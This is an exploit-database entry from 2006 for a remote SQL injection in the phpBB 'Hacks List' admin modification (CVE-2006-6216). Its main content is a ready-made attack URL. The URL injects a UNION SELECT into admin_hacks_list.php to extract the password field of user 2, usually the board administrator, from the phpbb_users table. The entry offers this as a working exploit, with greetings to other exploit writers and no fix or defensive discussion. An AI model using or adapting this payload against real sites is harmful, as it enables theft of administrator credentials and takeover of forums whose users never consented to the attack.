Hacks List phpBB Mod 1.21 - SQL Injection



EKU-ID: 10839 CVE: OSVDB-35833;CVE-2006-6216 OSVDB-ID:
Author: the master Published: 2006-11-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


########################################################################
#  Admin Hacks List  v1.20  Remote SQL Injection Vulnerability
#
#  Download: http://www.nivisec.com
#
#  Found By: the master
#
########################################################################
#  exploit:
#
# http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
#
# Greetz: str0ke , Dr Max Virus
########################################################################

# milw0rm.com [2006-11-26]